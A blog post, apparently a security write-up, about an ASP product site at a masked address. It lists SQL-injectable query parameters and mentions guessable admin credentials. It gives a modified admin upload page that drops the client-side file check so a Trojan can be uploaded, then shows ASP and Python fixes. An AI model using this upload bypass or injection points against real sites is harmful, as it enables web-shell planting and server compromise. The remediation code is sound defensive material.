Flaw0rs Blog
Server address: http://www.xxxxxx.cn/
Vulnerable files on the server:
/proshow.asp?classname=
/newlist.asp?newid=
/prolist.asp?proid=
/order.asp?proid=
The administrator username and password can be guessed.
The admin back end has an upload function.
Its check on whether an uploaded file is legitimate is done on the client side (local JavaScript):
Save the add-news page to the local machine and modify the code that restricts file uploads. The modified code follows.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0049)http://www.xxxx.cn/admin/products/picture.asp -->
<HTML><HEAD><TITLE>upload an image</TITLE>
<META http-equiv=Content-Type>
<LINK href="picture.files/style.css" type=text/css rel=stylesheet>
<SCRIPT language=javascript>
// the restricting code was deleted here
</SCRIPT>
<META name=GENERATOR></HEAD>
<BODY bgColor=#cedbff leftMargin=0 topMargin=0>
<TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0>
<FORM language=javascript name=myform
action=http://www.xxxxx.cn/admin/products/upfile.asp method=post encType=multipart/form-data>
<!-- the submission address was changed to point at the server's upload handler -->
<TBODY>
<TR vAlign=center align=middle>
<TD align=left height=15><INPUT type=file size=15 name=file1> <INPUT class="txt" type=submit value=upload name=B1 isshowprocessbar="true">
</TD></TR></FORM></TBODY></TABLE></BODY></HTML>
In this way, the Trojan can be uploaded directly:
http://www.xxxxxxx.cn/pic/flaw0r.txt
Fixing the vulnerabilities
1. /proshow.asp?classname=
<%
' strip single quotes so the value cannot break out of the SQL string literal
classname = Replace(Request("classname"), "'", "")
If classname = "" Then
    Set rs = Server.CreateObject("ADODB.Recordset")
    rs.Open "select * from products order by proid desc", conn, 1, 1
%>
2. /newlist.asp?newid=
<%
Set res = Server.CreateObject("ADODB.Recordset")
' CInt raises a type-mismatch error on anything that is not an integer, so the parameter can no longer carry SQL
SQL = "select * from news where newid=" & CInt(Request("newid"))
res.Open SQL, conn, 1, 1
%>
3. /prolist.asp?proid=
<%
Set res = Server.CreateObject("ADODB.Recordset")
SQL = "select * from products where proid=" & CInt(Request("proid"))
res.Open SQL, conn, 1, 1
%>
4. /order.asp?proid=
<%
Set res = Server.CreateObject("ADODB.Recordset")
SQL = "select * from products where proid=" & CInt(Request("proid"))
res.Open SQL, conn, 1, 1
%>
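A server-side version of these fixes, as an added example that is not code from the page (Python with sqlite3 standing in for the ASP/ADO code; the products table and its rows are constructed): proid is coerced to an integer the way CInt does and then bound as a query parameter, classname is bound instead of having quotes stripped, and the file check that picture.asp only performed in client-side JavaScript is repeated on the server.

```python
import re
import sqlite3

def make_sample_db():
    """Constructed stand-in for the site's products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (proid INTEGER, classname TEXT, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "tools", "hammer"), (2, "tools", "saw"), (3, "paint", "primer")])
    return conn

def to_int(raw):
    """Counterpart of CInt(Request("proid")): accept a plain integer, otherwise None."""
    if raw is None or re.fullmatch(r"\s*-?\d+\s*", raw) is None:
        return None
    return int(raw)

def product_by_id(conn, raw_proid):
    """prolist.asp?proid= / order.asp?proid=: integer check plus a bound parameter."""
    proid = to_int(raw_proid)
    if proid is None:
        return []  # "1 or 1=1" and the like never reach the SQL text
    return conn.execute("SELECT proid, name FROM products WHERE proid = ?",
                        (proid,)).fetchall()

def products_by_classname(conn, raw_classname):
    """proshow.asp?classname=: a string parameter, so bind it rather than stripping quotes."""
    return conn.execute("SELECT proid, name FROM products WHERE classname = ? ORDER BY proid",
                        (raw_classname,)).fetchall()

ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}

def upload_allowed(filename):
    """Server-side replacement for the JavaScript check that was deleted from picture.asp:
    only the final extension counts, and the stem must be plain [A-Za-z0-9_-]."""
    base = re.split(r"[\\/]", filename)[-1]  # ignore any client-supplied path
    m = re.fullmatch(r"([A-Za-z0-9_-]+)\.([A-Za-z0-9]+)", base)
    return m is not None and m.group(2).lower() in ALLOWED_EXT
```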
This article is not malicious in intent; advice and corrections are welcome. Thank you!